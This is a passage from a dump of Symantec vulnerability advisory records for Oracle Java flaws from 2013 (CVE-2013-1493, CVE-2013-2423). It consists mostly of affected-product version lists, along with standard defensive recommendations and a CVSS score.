Notes 8.5.2 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 9.0 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Rational Functional Tester 8.0.0.1 \n * IBM Rational Functional Tester 8.0.0.2 \n * IBM Rational Functional Tester 8.0.0.3 \n * IBM Rational Functional Tester 8.0.0.4 \n * IBM Rational Functional Tester 8.1 \n * IBM Rational Functional Tester 8.1.0.1 \n * IBM Rational Functional Tester 8.1.0.2 \n * IBM Rational Functional Tester 8.1.0.3 \n * IBM Rational Functional Tester 8.1.1 \n * IBM Rational Functional Tester 8.1.1.1 \n * IBM Rational Functional Tester 8.1.1.2 \n * IBM Rational Functional Tester 8.1.1.3 \n * IBM Rational Functional Tester 8.2 \n * IBM Rational Functional Tester 8.2.0.2 \n * IBM Rational Functional Tester 8.2.1.1 \n * IBM Rational Functional Tester 8.2.2 \n * IBM Rational Functional Tester 8.2.2.1 \n * IBM Rational Functional Tester 8.3 \n * IBM Rational Functional Tester 8.3.0.1 \n * IBM Rational Functional Tester 8.5.0.1 \n * IBM Rational Host On-Demand 11.0.0 \n * IBM Rational Host On-Demand 11.0.7 \n * IBM Service Delivery Manager 7.2.1 \n * IBM Service Delivery Manager 7.2.2 \n * IBM Service Delivery Manager 7.2.4 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.0 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.1 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.2 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.3 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.4 \n * IBM Tivoli Business Service Manager 4.2 \n * IBM Tivoli Business Service Manager 4.2.1 \n * IBM Tivoli Business Service Manager 6.1 \n * IBM Tivoli Business Service Manager 6.1.1 \n * IBM Tivoli Endpoint Manager for Remote Control 8.2.1 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli Netcool/OMNIbus 7.2.1 \n * IBM Tivoli Netcool/OMNIbus 7.3.0 \n * IBM Tivoli Netcool/OMNIbus 7.3.1 \n * IBM Tivoli Netcool/OMNIbus 7.4.0 \n * IBM Tivoli Remote Control 5.1.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.2 \n * IBM Tivoli System Automation Application Manager 3.1 \n * IBM Tivoli System Automation Application Manager 3.2 \n * IBM Tivoli System Automation Application Manager 3.2.1 \n * IBM Tivoli System Automation Application Manager 3.2.2 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * IBM WebSphere ILOG JRules 7.1.1 \n * IBM WebSphere MQ 7.0 \n * IBM WebSphere MQ 7.0.0 2 \n * IBM WebSphere MQ 7.0.0.1 \n * IBM WebSphere MQ 7.0.1 7 \n * IBM WebSphere MQ 7.0.1.1 \n * IBM WebSphere MQ 7.0.1.2 \n * IBM WebSphere MQ 7.0.1.3 \n * IBM WebSphere MQ 7.0.1.4 \n * IBM WebSphere MQ 7.0.1.5 \n * IBM WebSphere MQ 7.0.1.6 \n * IBM WebSphere MQ 7.0.1.8 \n * IBM WebSphere MQ 7.0.1.9 \n * IBM WebSphere MQ 7.1 \n * IBM WebSphere MQ 7.1.0.1 \n * IBM WebSphere MQ 7.1.0.2 \n * IBM WebSphere MQ 7.5 \n * IBM WebSphere MQ 7.5.0.1 \n * IBM WebSphere Message Broker 6.1.0.11 \n * IBM WebSphere Message Broker 7.0.0.5 \n * IBM WebSphere Message Broker 8.0.0.2 \n * IBM WebSphere Operational Decision Management 7.5.0.0 \n * IBM WebSphere Operational Decision Management 8.0.1 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * McAfee ePO-MVT 1.0.7 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.5.0_36 \n * Oracle JDK (Linux Production Release) 1.5.0_38 \n * Oracle JDK (Linux Production Release) 1.5.0_39 \n * Oracle JDK (Linux Production Release) 1.6.0_22 \n * Oracle JDK (Linux Production Release) 1.6.0_23 \n * Oracle JDK (Linux Production Release) 1.6.0_24 \n * Oracle JDK (Linux Production Release) 1.6.0_25 \n * Oracle JDK (Linux Production Release) 1.6.0_26 \n * Oracle JDK (Linux Production Release) 1.6.0_27 \n * Oracle JDK (Linux Production Release) 1.6.0_28 \n * Oracle JDK (Linux Production Release) 1.6.0_30 \n * Oracle JDK (Linux Production Release) 1.6.0_32 \n * Oracle JDK (Linux Production Release) 1.6.0_34 \n * Oracle JDK (Linux Production Release) 1.6.0_35 \n * Oracle JDK (Linux Production Release) 1.6.0_38 \n * Oracle JDK (Linux Production Release) 1.6.0_39 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.5.0_36 \n * Oracle JDK (Solaris Production Release) 1.5.0_38 \n * Oracle JDK (Solaris Production Release) 1.6.0_22 \n * Oracle JDK (Solaris Production Release) 1.6.0_23 \n * Oracle JDK (Solaris Production Release) 1.6.0_24 \n * Oracle JDK (Solaris Production Release) 1.6.0_25 \n * Oracle JDK (Solaris Production Release) 1.6.0_26 \n * Oracle JDK (Solaris Production Release) 1.6.0_27 \n * Oracle JDK (Solaris Production Release) 1.6.0_28 \n * Oracle JDK (Solaris Production Release) 1.6.0_30 \n * Oracle JDK (Solaris Production Release) 1.6.0_32 \n * Oracle JDK (Solaris Production Release) 1.6.0_34 \n * Oracle JDK (Solaris Production Release) 1.6.0_35 \n * Oracle JDK (Solaris Production Release) 1.6.0_37 \n * Oracle JDK (Solaris Production Release) 1.6.0_38 \n * Oracle JDK (Solaris Production Release) 1.6.0_39 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_13 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.5.0_36 \n * Oracle JDK (Windows Production Release) 1.5.0_38 \n * Oracle JDK (Windows Production Release) 1.6.0_22 \n * Oracle JDK (Windows Production Release) 1.6.0_23 \n * Oracle JDK (Windows Production Release) 1.6.0_24 \n * Oracle JDK (Windows Production Release) 1.6.0_25 \n * Oracle JDK (Windows Production Release) 1.6.0_26 \n * Oracle JDK (Windows Production Release) 1.6.0_27 \n * Oracle JDK (Windows Production Release) 1.6.0_28 \n * Oracle JDK (Windows Production Release) 1.6.0_30 \n * Oracle JDK (Windows Production Release) 1.6.0_32 \n * Oracle JDK (Windows Production Release) 1.6.0_35 \n * Oracle JDK (Windows Production Release) 1.6.0_37 \n * Oracle JDK (Windows Production Release) 1.6.0_38 \n * Oracle JDK (Windows Production Release) 1.6.0_39 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.5.0_40 \n * Oracle JDK(Linux Production Release) 1.6.0_37 \n * Oracle JDK(Linux Production Release) 1.6.0_40 \n * Oracle JDK(Linux Production Release) 1.6.0_41 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_13 \n * Oracle JDK(Linux Production Release) 1.7.0_14 \n * Oracle JDK(Linux Production Release) 1.7.0_15 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.5.0_39 \n * Oracle JDK(Solaris Production Release) 1.5.0_40 \n * Oracle JDK(Solaris Production Release) 1.6.0_39 \n * Oracle JDK(Solaris Production Release) 1.6.0_40 \n * Oracle JDK(Solaris Production Release) 1.6.0_41 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_14 \n * Oracle JDK(Solaris Production Release) 1.7.0_15 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.5.0_39 \n * Oracle JDK(Windows Production Release) 1.5.0_40 \n * Oracle JDK(Windows Production Release) 1.6.0_39 \n * Oracle JDK(Windows Production Release) 1.6.0_40 \n * Oracle JDK(Windows Production Release) 1.6.0_41 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_14 \n * Oracle JDK(Windows Production Release) 1.7.0_15 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.5.0_36 \n * Oracle JRE (Linux Production Release) 1.5.0_38 \n * Oracle JRE (Linux Production Release) 1.5.0_39 \n * Oracle JRE (Linux Production Release) 1.6.0_22 \n * Oracle JRE (Linux Production Release) 1.6.0_23 \n * Oracle JRE (Linux Production Release) 1.6.0_24 \n * Oracle JRE (Linux Production Release) 1.6.0_25 \n * Oracle JRE (Linux Production Release) 1.6.0_26 \n * Oracle JRE (Linux Production Release) 1.6.0_27 \n * Oracle JRE (Linux Production Release) 1.6.0_28 \n * Oracle JRE (Linux Production Release) 1.6.0_30 \n * Oracle JRE (Linux Production Release) 1.6.0_32 \n * Oracle JRE (Linux Production Release) 1.6.0_35 \n * Oracle JRE (Linux Production Release) 1.6.0_39 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.5.0_36 \n * Oracle JRE (Solaris Production Release) 1.5.0_38 \n * Oracle JRE (Solaris Production Release) 1.6.0_22 \n * Oracle JRE (Solaris Production Release) 1.6.0_23 \n * Oracle JRE (Solaris Production Release) 1.6.0_24 \n * Oracle JRE (Solaris Production Release) 1.6.0_25 \n * Oracle JRE (Solaris Production Release) 1.6.0_26 \n * Oracle JRE (Solaris Production Release) 1.6.0_27 \n * Oracle JRE (Solaris Production Release) 1.6.0_28 \n * Oracle JRE (Solaris Production Release) 1.6.0_30 \n * Oracle JRE (Solaris Production Release) 1.6.0_32 \n * Oracle JRE (Solaris Production Release) 1.6.0_35 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE (Windows Production Release) 1.5.0_36 \n * Oracle JRE (Windows Production Release) 1.5.0_38 \n * Oracle JRE (Windows Production Release) 1.6.0_22 \n * Oracle JRE (Windows Production Release) 1.6.0_23 \n * Oracle JRE (Windows Production Release) 1.6.0_24 \n * Oracle JRE (Windows Production Release) 1.6.0_25 \n * Oracle JRE (Windows Production Release) 1.6.0_26 \n * Oracle JRE (Windows Production Release) 1.6.0_27 \n * Oracle JRE (Windows Production Release) 1.6.0_28 \n * Oracle JRE (Windows Production Release) 1.6.0_30 \n * Oracle JRE (Windows Production Release) 1.6.0_32 \n * Oracle JRE (Windows Production Release) 1.6.0_35 \n * Oracle JRE (Windows Production Release) 1.6.0_38 \n * Oracle JRE (Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.5.0_40 \n * Oracle JRE(Linux Production Release) 1.6.0_38 \n * Oracle JRE(Linux Production Release) 1.6.0_40 \n * Oracle JRE(Linux Production Release) 1.6.0_41 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_13 \n * Oracle JRE(Linux Production Release) 1.7.0_14 \n * Oracle JRE(Linux Production Release) 1.7.0_15 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.5.0_39 \n * Oracle JRE(Solaris Production Release) 1.5.0_40 \n * Oracle JRE(Solaris Production Release) 1.6.0_38 \n * Oracle JRE(Solaris Production Release) 1.6.0_39 \n * Oracle JRE(Solaris Production Release) 1.6.0_40 \n * Oracle JRE(Solaris Production Release) 1.6.0_41 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_12 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_14 \n * Oracle JRE(Solaris Production Release) 1.7.0_15 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.5.0_39 \n * Oracle JRE(Windows Production Release) 1.5.0_40 \n * Oracle JRE(Windows Production Release) 1.6.0_38 \n * Oracle JRE(Windows Production Release) 1.6.0_39 \n * Oracle JRE(Windows Production Release) 1.6.0_40 \n * Oracle JRE(Windows Production Release) 1.6.0_41 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_14 \n * Oracle JRE(Windows Production Release) 1.7.0_15 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat Network Satellite (for RHEL 5) 5.5 \n * Redhat Network Satellite (for RHEL 6) 5.5 \n * Schneider-Electric Trio TView Software 3.27.0 \n * SuSE Linux Enterprise Software Development Kit 11 SP2 \n * SuSE SUSE Linux Enterprise 10 SP4 \n * SuSE SUSE Linux Enterprise Java 10 SP4 \n * SuSE SUSE Linux Enterprise Java 11 SP2 \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP2 \n * SuSE Suse Linux Enterprise Desktop 10 SP4 \n * SuSE Suse Linux Enterprise Desktop 11 SP2 \n * SuSE openSUSE 12.1 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 11.10 amd64 \n * Ubuntu Ubuntu Linux 11.10 i386 \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 12.10 amd64 \n * Ubuntu Ubuntu Linux 12.10 i386 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "published": "2013-02-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58238", "cvelist": ["CVE-2013-1347", "CVE-2013-1493"], "lastseen": "2018-03-13T14:30:54"}, {"id": "SMNTC-59162", "type": "symantec", "title": "Oracle Java Runtime Environment CVE-2013-2423 Security Bypass Vulnerability", "description": "### Description\n\nOracle Java Runtime Environment is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox protection and perform unauthorized actions in the context of the application. This vulnerability affects the following supported versions: 7 Update 17 and prior Note: This BID was previously titled 'Oracle Java SE CVE-2013-2423 Remote Java Runtime Environment Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.\n\n### Technologies Affected\n\n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya CMS R16 \n * Avaya CMS R16.3 \n * Avaya CMS r15 \n * Avaya CMS r17 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 1000M 7.5 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Server Edition 8.1 \n * Avaya Meeting Exchange 5.2 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Avaya Voice Portal 5.1.3 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Fedoraproject Fedora 19 \n * Gentoo Linux \n * IBM Intelligent Operations Center 1.5 \n * IBM Intelligent Operations Center 1.5.0.1 \n * IBM Intelligent Operations Center 1.5.0.2 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Java SE 6 \n * IBM Java SE 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.0.2.1 \n * IBM Lotus Domino 8.0.2.2 \n * IBM Lotus Domino 8.0.2.3 \n * IBM Lotus Domino 8.0.2.4 \n * IBM Lotus Domino 8.5.0 \n * IBM Lotus Domino 8.5.0.1 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.1.1 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Domino 8.5.4 \n * IBM Lotus Domino 9.0 \n * IBM Lotus Notes 8.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.0.2.1 \n * IBM Lotus Notes 8.0.2.2 \n * IBM Lotus Notes 8.0.2.3 \n * IBM Lotus Notes 8.0.2.4 \n * IBM Lotus Notes 8.0.2.5 \n * IBM Lotus Notes 8.0.2.6 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.0.1 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.1.2 \n * IBM Lotus Notes 8.5.1.3 \n * IBM Lotus Notes 8.5.1.4 \n * IBM Lotus Notes 8.5.1.5 \n * IBM Lotus Notes 8.5.2 \n * IBM Lotus Notes 8.5.2.1 \n * IBM Lotus Notes 8.5.2.2 \n * IBM Lotus Notes 8.5.2.3 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 9.0 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 6.2.1 \n * IBM Maximo Asset Management 6.2.2 \n * IBM Maximo Asset Management 6.2.3 \n * IBM Maximo Asset Management 6.2.4 \n * IBM Maximo Asset Management 6.2.5 \n * IBM Maximo Asset Management 6.2.6 \n * IBM Maximo Asset Management 6.2.7 \n * IBM Maximo Asset Management 6.2.8 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.1.1 \n * IBM Maximo Asset Management 7.1.2 \n * IBM Maximo Asset Management 7.2 \n * IBM Maximo Asset Management 7.2.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 6.2 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Operational Decision Manager 8.0 \n * IBM Operational Decision Manager 8.5 \n * IBM Rational Host On-Demand 11.0.0 \n * IBM Rational Host On-Demand 11.0.7 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.3.0 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli Monitoring 6.2.0 \n * IBM Tivoli Monitoring 6.2.1 \n * IBM Tivoli Monitoring 6.2.2 \n * IBM Tivoli Monitoring 6.2.3 \n * IBM Tivoli Monitoring 6.3.0 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.2 \n * IBM Tivoli System Automation Application Manager 3.1 \n * IBM Tivoli System Automation Application Manager 3.2 \n * IBM Tivoli System Automation Application Manager 3.2.1 \n * IBM Tivoli System Automation Application Manager 3.2.2 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * IBM Virtualization Engine TS7700 \n * IBM WebSphere ILOG JRules 7.1 \n * IBM WebSphere Operational Decision Management 7.5.0.0 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_17 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_17 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE 